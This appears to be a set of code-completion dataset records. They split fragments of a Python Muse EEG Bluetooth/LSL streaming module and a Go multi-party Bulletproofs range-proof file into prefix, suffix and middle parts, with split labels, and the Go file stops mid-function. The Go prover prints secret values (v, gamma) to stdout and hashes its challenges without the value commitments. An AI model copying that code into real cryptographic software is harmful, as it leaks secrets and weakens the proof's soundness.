print('Targeting first device BlueMuse discovers...')
else:
print('Targeting device: '
+ ':'.join(filter(None, [name, address])) + '...')
print('\n*BlueMuse will auto connect and stream when the device is found. \n*You can also use the BlueMuse interface to manage your stream(s).')
muse.start()
| _list_muses_bluetoothctl | identifier_name |
stream.py | import re
import subprocess
from sys import platform
from time import time
from functools import partial
from shutil import which
from pylsl import StreamInfo, StreamOutlet
import pygatt
from . import backends
from . import helper
from .muse import Muse
from .constants import MUSE_SCAN_TIMEOUT, AUTO_DISCONNECT_DELAY, \
MUSE_NB_EEG_CHANNELS, MUSE_SAMPLING_EEG_RATE, LSL_EEG_CHUNK, \
MUSE_NB_PPG_CHANNELS, MUSE_SAMPLING_PPG_RATE, LSL_PPG_CHUNK, \
MUSE_NB_ACC_CHANNELS, MUSE_SAMPLING_ACC_RATE, LSL_ACC_CHUNK, \
MUSE_NB_GYRO_CHANNELS, MUSE_SAMPLING_GYRO_RATE, LSL_GYRO_CHUNK
def _print_muse_list(muses):
for m in muses:
print(f'Found device {m["name"]}, MAC Address {m["address"]}')
if not muses:
print('No Muses found.')
# Returns a list of available Muse devices.
def list_muses(backend='auto', interface=None):
if backend == 'auto' and which('bluetoothctl') is not None:
print("Backend was 'auto' and bluetoothctl was found, using to list muses...")
return _list_muses_bluetoothctl(MUSE_SCAN_TIMEOUT)
backend = helper.resolve_backend(backend)
if backend == 'gatt':
interface = interface or 'hci0'
adapter = pygatt.GATTToolBackend(interface)
elif backend == 'bluemuse':
print('Starting BlueMuse, see BlueMuse window for interactive list of devices.')
subprocess.call('start bluemuse:', shell=True)
return
elif backend == 'bleak':
adapter = backends.BleakBackend()
elif backend == 'bgapi':
adapter = pygatt.BGAPIBackend(serial_port=interface)
try:
adapter.start()
print('Searching for Muses, this may take up to 10 seconds...')
devices = adapter.scan(timeout=MUSE_SCAN_TIMEOUT)
adapter.stop()
except pygatt.exceptions.BLEError as e:
if backend == 'gatt':
print('pygatt failed to scan for BLE devices. Trying with '
'bluetoothctl.')
return _list_muses_bluetoothctl(MUSE_SCAN_TIMEOUT)
else:
raise e
muses = [d for d in devices if d['name'] and 'Muse' in d['name']]
_print_muse_list(muses)
return muses
def _list_muses_bluetoothctl(timeout, verbose=False):
"""Identify Muse BLE devices using bluetoothctl.
When using backend='gatt' on Linux, pygatt relies on the command line tool
`hcitool` to scan for BLE devices. `hcitool` is however deprecated, and
seems to fail on Bluetooth 5 devices. This function roughly replicates the
functionality of `pygatt.backends.gatttool.gatttool.GATTToolBackend.scan()`
using the more modern `bluetoothctl` tool.
Deprecation of hcitool: https://git.kernel.org/pub/scm/bluetooth/bluez.git/commit/?id=b1eb2c4cd057624312e0412f6c4be000f7fc3617
"""
try:
import pexpect
except (ImportError, ModuleNotFoundError):
msg = ('pexpect is currently required to use bluetoothctl from within '
'a jupter notebook environment.')
raise ModuleNotFoundError(msg)
# Run scan using pexpect as subprocess.run returns immediately in jupyter
# notebooks
print('Searching for Muses, this may take up to 10 seconds...')
scan = pexpect.spawn('bluetoothctl scan on')
try:
scan.expect('foooooo', timeout=timeout)
except pexpect.EOF:
before_eof = scan.before.decode('utf-8', 'replace')
msg = f'Unexpected error when scanning: {before_eof}'
raise ValueError(msg)
except pexpect.TIMEOUT:
if verbose:
print(scan.before.decode('utf-8', 'replace').split('\r\n'))
# List devices using bluetoothctl
list_devices_cmd = ['bluetoothctl', 'devices']
devices = subprocess.run(
list_devices_cmd, stdout=subprocess.PIPE).stdout.decode(
'utf-8').split('\n')
muses = [{
'name': re.findall('Muse.*', string=d)[0],
'address': re.findall(r'..:..:..:..:..:..', string=d)[0]
} for d in devices if 'Muse' in d]
_print_muse_list(muses)
return muses
# Returns the address of the Muse with the name provided, otherwise returns address of first available Muse.
def find_muse(name=None, backend='auto'):
muses = list_muses(backend)
if name:
for muse in muses:
if muse['name'] == name:
return muse
elif muses:
return muses[0]
# Begins LSL stream(s) from a Muse with a given address with data sources determined by arguments
def stream(
address,
backend='auto',
interface=None,
name=None,
ppg_enabled=False,
acc_enabled=False,
gyro_enabled=False,
eeg_disabled=False,
preset=None,
disable_light=False,
timeout=AUTO_DISCONNECT_DELAY,
):
# If no data types are enabled, we warn the user and return immediately.
| if eeg_disabled and not ppg_enabled and not acc_enabled and not gyro_enabled:
print('Stream initiation failed: At least one data source must be enabled.')
return
# For any backend except bluemuse, we will start LSL streams hooked up to the muse callbacks.
if backend != 'bluemuse':
if not address:
found_muse = find_muse(name, backend)
if not found_muse:
return
else:
address = found_muse['address']
name = found_muse['name']
if not eeg_disabled:
eeg_info = StreamInfo('Muse', 'EEG', MUSE_NB_EEG_CHANNELS, MUSE_SAMPLING_EEG_RATE, 'float32',
'Muse%s' % address)
eeg_info.desc().append_child_value("manufacturer", "Muse")
eeg_channels = eeg_info.desc().append_child("channels")
for c in ['TP9', 'AF7', 'AF8', 'TP10', 'Right AUX']:
eeg_channels.append_child("channel") \
.append_child_value("label", c) \
.append_child_value("unit", "microvolts") \
.append_child_value("type", "EEG")
eeg_outlet = StreamOutlet(eeg_info, LSL_EEG_CHUNK)
if ppg_enabled:
ppg_info = StreamInfo('Muse', 'PPG', MUSE_NB_PPG_CHANNELS, MUSE_SAMPLING_PPG_RATE,
'float32', 'Muse%s' % address)
ppg_info.desc().append_child_value("manufacturer", "Muse")
ppg_channels = ppg_info.desc().append_child("channels")
for c in ['PPG1', 'PPG2', 'PPG3']:
ppg_channels.append_child("channel") \
.append_child_value("label", c) \
.append_child_value("unit", "mmHg") \
.append_child_value("type", "PPG")
ppg_outlet = StreamOutlet(ppg_info, LSL_PPG_CHUNK)
if acc_enabled:
acc_info = StreamInfo('Muse', 'ACC', MUSE_NB_ACC_CHANNELS, MUSE_SAMPLING_ACC_RATE,
'float32', 'Muse%s' % address)
acc_info.desc().append_child_value("manufacturer", "Muse")
acc_channels = acc_info.desc().append_child("channels")
for c in ['X', 'Y', 'Z']:
acc_channels.append_child("channel") \
.append_child_value("label", c) \
.append_child_value("unit", "g") \
.append_child_value("type", "accelerometer")
acc_outlet = StreamOutlet(acc_info, LSL_ACC_CHUNK)
if gyro_enabled:
gyro_info = StreamInfo('Muse', 'GYRO', MUSE_NB_GYRO_CHANNELS, MUSE_SAMPLING_GYRO_RATE,
'float32', 'Muse%s' % address)
gyro_info.desc().append_child_value("manufacturer", "Muse")
gyro_channels = gyro_info.desc().append_child("channels")
for c in ['X', 'Y', 'Z']:
gyro_channels.append_child("channel") \
.append_child_value("label", c) \
.append_child_value("unit", "dps") \
.append_child_value("type", "gyroscope")
gyro_outlet = StreamOutlet(gyro_info, LSL_GYRO_CHUNK)
def push(data, timestamps, outlet):
for ii in range(data.shape[1]):
outlet.push_sample(data[:, ii], timestamps[ii])
push_eeg = partial(push, outlet=eeg_outlet) if not eeg_disabled else None
push_ppg = partial(push, outlet=ppg_outlet) if ppg_enabled else None
push_acc = partial(push, outlet=acc_outlet) if acc_enabled else None
push_gyro = partial(push, outlet=gyro_outlet) if gyro_enabled else None
muse = Muse(address=address, callback_eeg=push_eeg, callback_ppg=push_ppg, callback_acc=push_acc, callback_gyro=push_gyro,
backend=backend, interface=interface, name=name, preset=preset, disable_light=disable_light)
didConnect = muse.connect()
if(didConnect):
print('Connected.')
muse.start()
eeg_string = " EEG" if not eeg_disabled else ""
ppg_string = " PPG" if ppg_enabled else ""
acc_string = " ACC" if acc_enabled else ""
gyro_string = " GYRO" if gyro_enabled else ""
print("Streaming%s%s%s%s..." %
(eeg_string, ppg_string, acc_string, gyro_string))
while time() - muse.last_timestamp < timeout:
try:
backends.sleep(1)
except KeyboardInterrupt:
muse.stop()
muse.disconnect()
break
print('Disconnected.')
# For bluemuse backend, we don't need to create LSL streams directly, since these are handled in BlueMuse itself.
else:
# Toggle all data stream types in BlueMuse.
subprocess.call('start bluemuse://setting?key=eeg_enabled!value={}'.format('false' if eeg_disabled else 'true'), shell=True)
subprocess.call('start bluemuse://setting?key=ppg_enabled!value={}'.format('true' if ppg_enabled else 'false'), shell=True)
subprocess.call('start bluemuse://setting?key=accelerometer_enabled!value={}'.format('true' if acc_enabled else 'false'), shell=True)
subprocess.call('start bluemuse://setting?key=gyroscope_enabled!value={}'.format('true' if gyro_enabled else 'false'), shell=True)
muse = Muse(address=address, callback_eeg=None, callback_ppg=None, callback_acc=None, callback_gyro=None,
backend=backend, interface=interface, name=name)
muse.connect()
if not address and not name:
print('Targeting first device BlueMuse discovers...')
else:
print('Targeting device: '
+ ':'.join(filter(None, [name, address])) + '...')
print('\n*BlueMuse will auto connect and stream when the device is found. \n*You can also use the BlueMuse interface to manage your stream(s).')
muse.start() | identifier_body | |
stream.py | import re
import subprocess
from sys import platform
from time import time
from functools import partial
from shutil import which
from pylsl import StreamInfo, StreamOutlet
import pygatt
from . import backends
from . import helper
from .muse import Muse
from .constants import MUSE_SCAN_TIMEOUT, AUTO_DISCONNECT_DELAY, \
MUSE_NB_EEG_CHANNELS, MUSE_SAMPLING_EEG_RATE, LSL_EEG_CHUNK, \
MUSE_NB_PPG_CHANNELS, MUSE_SAMPLING_PPG_RATE, LSL_PPG_CHUNK, \
MUSE_NB_ACC_CHANNELS, MUSE_SAMPLING_ACC_RATE, LSL_ACC_CHUNK, \
MUSE_NB_GYRO_CHANNELS, MUSE_SAMPLING_GYRO_RATE, LSL_GYRO_CHUNK
def _print_muse_list(muses):
for m in muses:
print(f'Found device {m["name"]}, MAC Address {m["address"]}')
if not muses:
print('No Muses found.')
# Returns a list of available Muse devices.
def list_muses(backend='auto', interface=None):
if backend == 'auto' and which('bluetoothctl') is not None:
print("Backend was 'auto' and bluetoothctl was found, using to list muses...")
return _list_muses_bluetoothctl(MUSE_SCAN_TIMEOUT)
backend = helper.resolve_backend(backend)
if backend == 'gatt':
interface = interface or 'hci0'
adapter = pygatt.GATTToolBackend(interface)
elif backend == 'bluemuse':
print('Starting BlueMuse, see BlueMuse window for interactive list of devices.')
subprocess.call('start bluemuse:', shell=True)
return
elif backend == 'bleak':
adapter = backends.BleakBackend()
elif backend == 'bgapi':
adapter = pygatt.BGAPIBackend(serial_port=interface)
try:
adapter.start()
print('Searching for Muses, this may take up to 10 seconds...')
devices = adapter.scan(timeout=MUSE_SCAN_TIMEOUT)
adapter.stop()
except pygatt.exceptions.BLEError as e:
if backend == 'gatt':
print('pygatt failed to scan for BLE devices. Trying with '
'bluetoothctl.')
return _list_muses_bluetoothctl(MUSE_SCAN_TIMEOUT)
else:
raise e
muses = [d for d in devices if d['name'] and 'Muse' in d['name']]
_print_muse_list(muses)
return muses
def _list_muses_bluetoothctl(timeout, verbose=False):
"""Identify Muse BLE devices using bluetoothctl.
When using backend='gatt' on Linux, pygatt relies on the command line tool
`hcitool` to scan for BLE devices. `hcitool` is however deprecated, and
seems to fail on Bluetooth 5 devices. This function roughly replicates the
functionality of `pygatt.backends.gatttool.gatttool.GATTToolBackend.scan()`
using the more modern `bluetoothctl` tool.
Deprecation of hcitool: https://git.kernel.org/pub/scm/bluetooth/bluez.git/commit/?id=b1eb2c4cd057624312e0412f6c4be000f7fc3617
"""
try:
import pexpect
except (ImportError, ModuleNotFoundError):
msg = ('pexpect is currently required to use bluetoothctl from within '
'a jupter notebook environment.')
raise ModuleNotFoundError(msg)
# Run scan using pexpect as subprocess.run returns immediately in jupyter
# notebooks
print('Searching for Muses, this may take up to 10 seconds...')
scan = pexpect.spawn('bluetoothctl scan on')
try:
scan.expect('foooooo', timeout=timeout)
except pexpect.EOF:
before_eof = scan.before.decode('utf-8', 'replace')
msg = f'Unexpected error when scanning: {before_eof}'
raise ValueError(msg)
except pexpect.TIMEOUT:
if verbose:
print(scan.before.decode('utf-8', 'replace').split('\r\n'))
# List devices using bluetoothctl | muses = [{
'name': re.findall('Muse.*', string=d)[0],
'address': re.findall(r'..:..:..:..:..:..', string=d)[0]
} for d in devices if 'Muse' in d]
_print_muse_list(muses)
return muses
# Returns the address of the Muse with the name provided, otherwise returns address of first available Muse.
def find_muse(name=None, backend='auto'):
muses = list_muses(backend)
if name:
for muse in muses:
if muse['name'] == name:
return muse
elif muses:
return muses[0]
# Begins LSL stream(s) from a Muse with a given address with data sources determined by arguments
def stream(
address,
backend='auto',
interface=None,
name=None,
ppg_enabled=False,
acc_enabled=False,
gyro_enabled=False,
eeg_disabled=False,
preset=None,
disable_light=False,
timeout=AUTO_DISCONNECT_DELAY,
):
# If no data types are enabled, we warn the user and return immediately.
if eeg_disabled and not ppg_enabled and not acc_enabled and not gyro_enabled:
print('Stream initiation failed: At least one data source must be enabled.')
return
# For any backend except bluemuse, we will start LSL streams hooked up to the muse callbacks.
if backend != 'bluemuse':
if not address:
found_muse = find_muse(name, backend)
if not found_muse:
return
else:
address = found_muse['address']
name = found_muse['name']
if not eeg_disabled:
eeg_info = StreamInfo('Muse', 'EEG', MUSE_NB_EEG_CHANNELS, MUSE_SAMPLING_EEG_RATE, 'float32',
'Muse%s' % address)
eeg_info.desc().append_child_value("manufacturer", "Muse")
eeg_channels = eeg_info.desc().append_child("channels")
for c in ['TP9', 'AF7', 'AF8', 'TP10', 'Right AUX']:
eeg_channels.append_child("channel") \
.append_child_value("label", c) \
.append_child_value("unit", "microvolts") \
.append_child_value("type", "EEG")
eeg_outlet = StreamOutlet(eeg_info, LSL_EEG_CHUNK)
if ppg_enabled:
ppg_info = StreamInfo('Muse', 'PPG', MUSE_NB_PPG_CHANNELS, MUSE_SAMPLING_PPG_RATE,
'float32', 'Muse%s' % address)
ppg_info.desc().append_child_value("manufacturer", "Muse")
ppg_channels = ppg_info.desc().append_child("channels")
for c in ['PPG1', 'PPG2', 'PPG3']:
ppg_channels.append_child("channel") \
.append_child_value("label", c) \
.append_child_value("unit", "mmHg") \
.append_child_value("type", "PPG")
ppg_outlet = StreamOutlet(ppg_info, LSL_PPG_CHUNK)
if acc_enabled:
acc_info = StreamInfo('Muse', 'ACC', MUSE_NB_ACC_CHANNELS, MUSE_SAMPLING_ACC_RATE,
'float32', 'Muse%s' % address)
acc_info.desc().append_child_value("manufacturer", "Muse")
acc_channels = acc_info.desc().append_child("channels")
for c in ['X', 'Y', 'Z']:
acc_channels.append_child("channel") \
.append_child_value("label", c) \
.append_child_value("unit", "g") \
.append_child_value("type", "accelerometer")
acc_outlet = StreamOutlet(acc_info, LSL_ACC_CHUNK)
if gyro_enabled:
gyro_info = StreamInfo('Muse', 'GYRO', MUSE_NB_GYRO_CHANNELS, MUSE_SAMPLING_GYRO_RATE,
'float32', 'Muse%s' % address)
gyro_info.desc().append_child_value("manufacturer", "Muse")
gyro_channels = gyro_info.desc().append_child("channels")
for c in ['X', 'Y', 'Z']:
gyro_channels.append_child("channel") \
.append_child_value("label", c) \
.append_child_value("unit", "dps") \
.append_child_value("type", "gyroscope")
gyro_outlet = StreamOutlet(gyro_info, LSL_GYRO_CHUNK)
def push(data, timestamps, outlet):
for ii in range(data.shape[1]):
outlet.push_sample(data[:, ii], timestamps[ii])
push_eeg = partial(push, outlet=eeg_outlet) if not eeg_disabled else None
push_ppg = partial(push, outlet=ppg_outlet) if ppg_enabled else None
push_acc = partial(push, outlet=acc_outlet) if acc_enabled else None
push_gyro = partial(push, outlet=gyro_outlet) if gyro_enabled else None
muse = Muse(address=address, callback_eeg=push_eeg, callback_ppg=push_ppg, callback_acc=push_acc, callback_gyro=push_gyro,
backend=backend, interface=interface, name=name, preset=preset, disable_light=disable_light)
didConnect = muse.connect()
if(didConnect):
print('Connected.')
muse.start()
eeg_string = " EEG" if not eeg_disabled else ""
ppg_string = " PPG" if ppg_enabled else ""
acc_string = " ACC" if acc_enabled else ""
gyro_string = " GYRO" if gyro_enabled else ""
print("Streaming%s%s%s%s..." %
(eeg_string, ppg_string, acc_string, gyro_string))
while time() - muse.last_timestamp < timeout:
try:
backends.sleep(1)
except KeyboardInterrupt:
muse.stop()
muse.disconnect()
break
print('Disconnected.')
# For bluemuse backend, we don't need to create LSL streams directly, since these are handled in BlueMuse itself.
else:
# Toggle all data stream types in BlueMuse.
subprocess.call('start bluemuse://setting?key=eeg_enabled!value={}'.format('false' if eeg_disabled else 'true'), shell=True)
subprocess.call('start bluemuse://setting?key=ppg_enabled!value={}'.format('true' if ppg_enabled else 'false'), shell=True)
subprocess.call('start bluemuse://setting?key=accelerometer_enabled!value={}'.format('true' if acc_enabled else 'false'), shell=True)
subprocess.call('start bluemuse://setting?key=gyroscope_enabled!value={}'.format('true' if gyro_enabled else 'false'), shell=True)
muse = Muse(address=address, callback_eeg=None, callback_ppg=None, callback_acc=None, callback_gyro=None,
backend=backend, interface=interface, name=name)
muse.connect()
if not address and not name:
print('Targeting first device BlueMuse discovers...')
else:
print('Targeting device: '
+ ':'.join(filter(None, [name, address])) + '...')
print('\n*BlueMuse will auto connect and stream when the device is found. \n*You can also use the BlueMuse interface to manage your stream(s).')
muse.start() | list_devices_cmd = ['bluetoothctl', 'devices']
devices = subprocess.run(
list_devices_cmd, stdout=subprocess.PIPE).stdout.decode(
'utf-8').split('\n') | random_line_split |
mpc_range_proof.go | package mbp
import (
"crypto/rand"
"crypto/sha256"
"fmt"
"math/big"
)
// MPCRangeProof is a struct of secure multi-party computation range proof
type MPCRangeProof struct {
Comms []ECPoint
A ECPoint
S ECPoint
T1 ECPoint
T2 ECPoint
Tau *big.Int
Th *big.Int
Mu *big.Int
IPP InnerProdArg
// challenges
Cy *big.Int
Cz *big.Int
Cx *big.Int
}
// PrivateParams is the private params of Prover
type PrivateParams struct {
Id int
V *big.Int
AL []*big.Int
AR []*big.Int
SL []*big.Int
SR []*big.Int
Gamma *big.Int
Alpha *big.Int
Rho *big.Int
Tt0 *big.Int
Tt1 *big.Int
Tt2 *big.Int
Tau1 *big.Int
Tau2 *big.Int
}
type InitParams struct {
//EC CryptoParams
N int
M int
}
type ASCommitment struct {
Comm ECPoint
A ECPoint
S ECPoint
}
type T1T2Commitment struct {
T1 ECPoint
T2 ECPoint
}
type OtherShare struct {
Left []*big.Int
Right []*big.Int
That *big.Int
Taux *big.Int
Mu *big.Int
}
func AandS(v *big.Int, id, m int, prip *PrivateParams, EC CryptoParams) ASCommitment {
AS := ASCommitment{}
fmt.Printf("v: %v\n", v)
bitsPerValue := EC.V / m //
if v.Cmp(big.NewInt(0)) == -1 {
panic("Value is below range! Not proving")
}
if v.Cmp(new(big.Int).Exp(big.NewInt(2), big.NewInt(int64(bitsPerValue)), EC.N)) == 1 {
panic("Value is above range! Not proving.")
}
prip.Id = id
prip.V = v
gamma, err := rand.Int(rand.Reader, EC.N)
prip.Gamma = gamma
fmt.Printf("gamma: %v\n", gamma)
check(err)
comm := EC.G.Mult(v, EC).Add(EC.H.Mult(gamma, EC), EC)
AS.Comm = comm
aL := reverse(StrToBigIntArray(PadLeft(fmt.Sprintf("%b", v), "0", bitsPerValue)))
prip.AL = aL
aR := VectorAddScalar(aL, big.NewInt(-1), EC)
prip.AR = aR
alpha, err := rand.Int(rand.Reader, EC.N)
check(err)
prip.Alpha = alpha
// 设置cryptoparams.go中 v = n * m
BPG := EC.BPG[id*bitsPerValue : (id+1)*bitsPerValue]
BPH := EC.BPH[id*bitsPerValue : (id+1)*bitsPerValue]
A := TwoVectorPCommitWithGens(BPG, BPH, aL, aR, EC).Add(EC.H.Mult(alpha, EC), EC)
AS.A = A
sL := RandVector(bitsPerValue, EC)
sR := RandVector(bitsPerValue, EC)
prip.SL = sL
prip.SR = sR
rho, err := rand.Int(rand.Reader, EC.N)
check(err)
prip.Rho = rho
S := TwoVectorPCommitWithGens(BPG, BPH, sL, sR, EC).Add(EC.H.Mult(rho, EC), EC)
AS.S = S
return AS
}
func Fait_y_z(A, S []ECPoint, mpcrp *MPCRangeProof, EC CryptoParams) (*big.Int, *big.Int) {
countA := EC.Zero()
countS := EC.Zero()
for i := 0; i < len(A); i++ {
// 是代码中定义的加 代码定义
countA = countA.Add(A[i], EC)
countS = countS.Add(S[i], EC)
}
mpcrp.A = countA
mpcrp.S = countS
chal1s256 := sha256.Sum256([]byte(countA.X.String() + countA.Y.String()))
cy := new(big.Int).SetBytes(chal1s256[:])
mpcrp.Cy = cy
chal2s256 := sha256.Sum256([]byte(countS.X.String() + countS.Y.String()))
cz := new(big.Int).SetBytes(chal2s256[:])
mpcrp.Cz = cz
return cy, cz
}
/*
DeltaMPC is a helper function that is used in the range proof
\DeltaMPC(y, z) = (z-z^2)<1^n, y^n> - z^3 * z^j * <1^n, 2^n>
*/
func DeltaMPC(y []*big.Int, z *big.Int, id, m int, EC CryptoParams) *big.Int {
result := big.NewInt(0)
// (z-z^2)<1^n, y^n>
z2 := new(big.Int).Mod(new(big.Int).Mul(z, z), EC.N)
t1 := new(big.Int).Mod(new(big.Int).Sub(z, z2), EC.N)
t2 := new(big.Int).Mod(new(big.Int).Mul(t1, VectorSum(y, EC)), EC.N)
// z^(3+j)<1^n, 2^n>
z3j := new(big.Int).Exp(z, big.NewInt(3+int64(id)), EC.N)
po2sum := new(big.Int).Sub(new(big.Int).Exp(big.NewInt(2), big.NewInt(int64(EC.V/m)), EC.N), big.NewInt(1))
t3 := new(big.Int).Mod(new(big.Int).Mul(z3j, po2sum), EC.N)
result = new(big.Int).Mod(new(big.Int).Sub(t2, t3), EC.N)
return result
}
func T1andT2(v *big.Int, id, m int, cy, cz *big.Int, prip *PrivateParams, EC CryptoParams) T1T2Commitment {
t1t2 := T1T2Commitment{}
// aL aR sL sR
aL := prip.AL
aR := prip.AR
sL := prip.SL
sR := prip.SR
bitsPerValue := EC.V / m
// PowerOfTwos
PowerOfTwos := PowerVector(bitsPerValue, big.NewInt(2), EC)
PowerOfCY := PowerVector(EC.V, cy, EC) // EC.V = n * m
zPowersTimesTwoVec := make([]*big.Int, EC.V) //
for j := 0; j < m; j++ {
zp := new(big.Int).Exp(cz, big.NewInt(2+int64(j)), EC.N)
for i := 0; i < bitsPerValue; i++ {
zPowersTimesTwoVec[j*bitsPerValue+i] = new(big.Int).Mod(new(big.Int).Mul(PowerOfTwos[i], zp), EC.N)
}
}
yn := PowerOfCY[id*bitsPerValue : (id+1)*bitsPerValue]
z2j2n := zPowersTimesTwoVec[id*bitsPerValue : (id+1)*bitsPerValue]
l0 := VectorAddScalar(aL, new(big.Int).Neg(cz), EC)
l1 := sL
r0 := VectorAdd(
VectorHadamard(
yn,
VectorAddScalar(aR, cz, EC), EC),
z2j2n, EC)
r1 := VectorHadamard(sR, yn, EC)
//calculate t0
z2 := new(big.Int).Mod(new(big.Int).Mul(cz, cz), EC.N)
PowerOfCZ := PowerVector(m, cz, EC)
vz2 := new(big.Int).Mul(PowerOfCZ[id], new(big.Int).Mul(v, z2))
vz2 = new(big.Int).Mod(vz2, EC.N)
t0 := new(big.Int).Mod(new(big.Int).Add(vz2, DeltaMPC(yn, cz, id, m, EC)), EC.N)
t1 := new(big.Int).Mod(new(big.Int).Add(InnerProduct(l1, r0, EC), InnerProduct(l0, r1, EC)), EC.N)
t2 := InnerProduct(l1, r1, EC)
prip.Tt0 = t0
prip.Tt1 = t1
prip.Tt2 = t2
|
// given the t_i values, we can generate commitments to them
tau1, err := rand.Int(rand.Reader, EC.N)
check(err)
tau2, err := rand.Int(rand.Reader, EC.N)
check(err)
prip.Tau1 = tau1
prip.Tau2 = tau2
T1 := EC.G.Mult(t1, EC).Add(EC.H.Mult(tau1, EC), EC) //commitment to t1
T2 := EC.G.Mult(t2, EC).Add(EC.H.Mult(tau2, EC), EC) //commitment to t2
t1t2.T1 = T1
t1t2.T2 = T2
return t1t2
}
func Fait_x(T1, T2 []ECPoint, mpcrp *MPCRangeProof, EC CryptoParams) *big.Int {
countT1 := EC.Zero()
countT2 := EC.Zero()
for i := 0; i < len(T1); i++ {
countT1 = countT1.Add(T1[i], EC)
countT2 = countT2.Add(T2[i], EC)
}
mpcrp.T1 = countT1
mpcrp.T2 = countT2
chal3s256 := sha256.Sum256([]byte(countT1.X.String() + countT1.Y.String() + countT2.X.String() + countT2.Y.String()))
cx := new(big.Int).SetBytes(chal3s256[:])
mpcrp.Cx = cx
return cx
}
func ProFinal(v *big.Int, id, m int, cy, cz, cx *big.Int, prip *PrivateParams, EC CryptoParams) OtherShare {
share := OtherShare{}
// aL aR sL sR
aL := prip.AL
aR := prip.AR
sL := prip.SL
sR := prip.SR
// PowerOfCY PowerOfTwos zPowersTimesTwoVec
bitsPerValue := EC.V / m
PowerOfCY := PowerVector(EC.V, cy, EC)
PowerOfTwos := PowerVector(bitsPerValue, big.NewInt(2), EC)
zPowersTimesTwoVec := make([]*big.Int, EC.V) //
for j := 0; j < m; j++ {
zp := new(big.Int).Exp(cz, big.NewInt(2+int64(j)), EC.N)
for i := 0; i < bitsPerValue; i++ {
zPowersTimesTwoVec[j*bitsPerValue+i] = new(big.Int).Mod(new(big.Int).Mul(PowerOfTwos[i], zp), EC.N)
}
}
yn := PowerOfCY[id*bitsPerValue : (id+1)*bitsPerValue]
z2j2n := zPowersTimesTwoVec[id*bitsPerValue : (id+1)*bitsPerValue]
left := CalculateLMRP(aL, sL, cz, cx, EC)
right := CalculateRMRP(aR, sR, yn, z2j2n, cz, cx, EC)
share.Left = left
share.Right = right
// t0 t1 t2
t0 := prip.Tt0
t1 := prip.Tt1
t2 := prip.Tt2
thatPrime := new(big.Int).Mod( // t0 + t1*x + t2*x^2
new(big.Int).Add(t0, new(big.Int).Add(new(big.Int).Mul(t1, cx), new(big.Int).Mul(new(big.Int).Mul(cx, cx), t2))), EC.N)
that := InnerProduct(left, right, EC) // NOTE: BP Java implementation calculates this from the t_i
// thatPrime and that should be equal
if thatPrime.Cmp(that) != 0 {
fmt.Println("Proving -- Uh oh! Two diff ways to compute same value not working")
fmt.Printf("\tthatPrime = %s\n", thatPrime.String())
fmt.Printf("\tthat = %s \n", that.String())
}
share.That = that
// tau1, tau2, gamma rho
tau1 := prip.Tau1
tau2 := prip.Tau2
gamma := prip.Gamma
rho := prip.Rho
alpha := prip.Alpha
fmt.Printf("gamma: %v\n", gamma)
taux1 := new(big.Int).Mod(new(big.Int).Mul(tau2, new(big.Int).Mul(cx, cx)), EC.N)
taux2 := new(big.Int).Mod(new(big.Int).Mul(tau1, cx), EC.N)
z2j := new(big.Int).Exp(cz, big.NewInt(2+int64(id)), EC.N)
tmp1 := new(big.Int).Mul(gamma, z2j)
taux := new(big.Int).Mod(new(big.Int).Add(taux1, new(big.Int).Add(taux2, tmp1)), EC.N)
mu := new(big.Int).Mod(new(big.Int).Add(alpha, new(big.Int).Mul(rho, cx)), EC.N)
share.Taux = taux
share.Mu = mu
return share
}
func DealerFinal(left, right []*big.Int, tx, rx, mu []*big.Int, m int, mpcrp *MPCRangeProof, cy *big.Int, EC CryptoParams) {
countThat := big.NewInt(0)
countTaux := big.NewInt(0)
countMu := big.NewInt(0)
countLeft := left
countRight := right
bitsPerValue := EC.V / m
for j := 0; j < len(tx); j++ {
countThat = new(big.Int).Add(countThat, tx[j])
countTaux = new(big.Int).Add(countTaux, rx[j])
countMu = new(big.Int).Add(countMu, mu[j])
}
mpcrp.Tau = countTaux
mpcrp.Th = countThat
mpcrp.Mu = countMu
HPrime := make([]ECPoint, len(EC.BPH))
PowerOfCY := PowerVector(EC.V, cy, EC)
for j := 0; j < m; j++ {
for i := 0; i < bitsPerValue; i++ {
HPrime[j*bitsPerValue+i] = EC.BPH[j*bitsPerValue+i].Mult(new(big.Int).ModInverse(PowerOfCY[j*bitsPerValue+i], EC.N), EC)
}
}
P := TwoVectorPCommitWithGens(EC.BPG, HPrime, countLeft, countRight, EC)
that := InnerProduct(countLeft, countRight, EC)
IPP := InnerProductProve(countLeft, countRight, that, P, EC.U, EC.BPG, HPrime, EC)
mpcrp.IPP = IPP
}
func MPCVerify(mrp *MPCRangeProof, EC CryptoParams) bool {
m := len(mrp.Comms)
bitsPerValue := EC.V / m
//changes:
// check 1 changes since it includes all commitments
// check 2 commitment generation is also different
// verify the challenges
chal1s256 := sha256.Sum256([]byte(mrp.A.X.String() + mrp.A.Y.String()))
cy := new(big.Int).SetBytes(chal1s256[:])
if cy.Cmp(mrp.Cy) != 0 {
fmt.Println("MPCVerify - Challenge Cy failing!")
return false
}
chal2s256 := sha256.Sum256([]byte(mrp.S.X.String() + mrp.S.Y.String()))
cz := new(big.Int).SetBytes(chal2s256[:])
if cz.Cmp(mrp.Cz) != 0 {
fmt.Println("MPCVerify - Challenge Cz failing!")
return false
}
chal3s256 := sha256.Sum256([]byte(mrp.T1.X.String() + mrp.T1.Y.String() + mrp.T2.X.String() + mrp.T2.Y.String()))
cx := new(big.Int).SetBytes(chal3s256[:])
if cx.Cmp(mrp.Cx) != 0 {
fmt.Println("MPCVerify - Challenge Cx failing!")
return false
}
// given challenges are correct, very range proof
PowersOfY := PowerVector(EC.V, cy, EC)
// t_hat * G + tau * H
lhs := EC.G.Mult(mrp.Th, EC).Add(EC.H.Mult(mrp.Tau, EC), EC)
// z^2 * \bold{z}^m \bold{V} + delta(y,z) * G + x * T1 + x^2 * T2
CommPowers := EC.Zero()
PowersOfZ := PowerVector(m, cz, EC)
z2 := new(big.Int).Mod(new(big.Int).Mul(cz, cz), EC.N)
for j := 0; j < m; j++ {
CommPowers = CommPowers.Add(mrp.Comms[j].Mult(new(big.Int).Mul(z2, PowersOfZ[j]), EC), EC)
}
rhs := EC.G.Mult(DeltaMRP(PowersOfY, cz, m, EC), EC).Add(
mrp.T1.Mult(cx, EC), EC).Add(
mrp.T2.Mult(new(big.Int).Mul(cx, cx), EC), EC).Add(CommPowers, EC)
if !lhs.Equal(rhs) {
fmt.Println("MPCVerify - Uh oh! Check line (63) of verification")
fmt.Println(rhs)
fmt.Println(lhs)
return false
}
tmp1 := EC.Zero()
zneg := new(big.Int).Mod(new(big.Int).Neg(cz), EC.N)
